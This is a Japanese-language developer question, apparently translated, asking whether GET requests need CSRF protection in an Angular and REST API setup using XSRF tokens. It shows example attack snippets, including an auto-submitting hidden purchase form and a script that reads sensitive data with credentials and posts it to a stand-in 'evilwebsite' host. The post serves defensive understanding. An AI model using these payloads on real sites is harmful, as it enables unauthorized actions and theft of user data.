GETリクエストにはCSRF保護が必要

REST APIを使用して、認証されたユーザーが自分のアカウントに関するデータを読み取り、自分のアカウントに変更を加えることができます。認証には、httpOnly Cookieとして保存されたJWTを使用します。CSRF攻撃から保護するために、= REST APIは、クライアントにAngularが「XSRFトークン」を呼び出すものを提供します。

AngularのCSRF保護の方法は、APIが作成したXSRFトークンを取得し、「X-XSRF-Token」ヘッダー内の各リクエストでAPIに再送信することです。リクエストを許可するかどうかは、APIが決定します。悪意のあるWebサイトで実行されているスクリプトはXSRFトークンにアクセスできないため、CSRF要求とともに送信することはできません。

AngularにHttpClientを使用してフロントエンドリクエストを実装したところ、HttpXsrfInterceptorがX-XSRF-TokenヘッダーをGETおよびHEADリクエスト。

オンラインで読んだ意見では、GETリクエストはデータを変更しない（または変更してはならない）ため、CSRF保護は必要ありません。 GETリクエストでできるCSRF攻撃のほとんどは、REST APIが機密データをユーザーのWebブラウザーに送信することです。悪意のあるWebサイトはそのデータを見ることができません。

例1：CSRF GET

悪意のあるWebサイトが次のようなCSRF GETリクエストを発行しようとした場合：

<img src="https://example.com/sensitiveData">

次に、機密データがAPIからユーザーのWebブラウザーに送信されますが、悪意のあるWebサイトはデータを見ることができないため、すべて正常です。

例2：CSRF POST

悪意のあるWebサイトがCSRF POSTリクエストを次のように発行しようとした場合：

<body onLoad="document.forms[0].submit()">
<form method="post" action="https://example.com/purchase">
  <input type="hidden" name="itemId" value="34873847">
  <input type="submit" value="View Kittens">
</form>
...

その場合、悪意のあるWebサイトにはデータが表示されませんが、ユーザーに損害を与える可能性があります。 APIがX-XSRF-Tokenヘッダーの存在を必要とする場合、この攻撃は成功しません。

例3：AjaxによるCSRF GET

しかし、悪意のあるWebサイトがブラウザに次のようなGETリクエストを強制するとどうなりますか。

<script>
$.ajax('https://example.com/sensitiveData', {
  xhrFields: {
    withCredentials: true,
  },
}).done((sensitiveData) => {
  $.ajax('https://evilwebsite/logData', {
    method: 'post',
    data: sensitiveData,
  }).done(() => {
    console.log('I stole your data', sensitiveData)
  });
});
</script>

一部のCORSポリシーはこれを阻止しますが、他のCORSポリシーはそれを実現させます。

GETリクエストでCSRF保護を要求すると、この脆弱性が緩和されるようです。

重要なものが欠けていますか？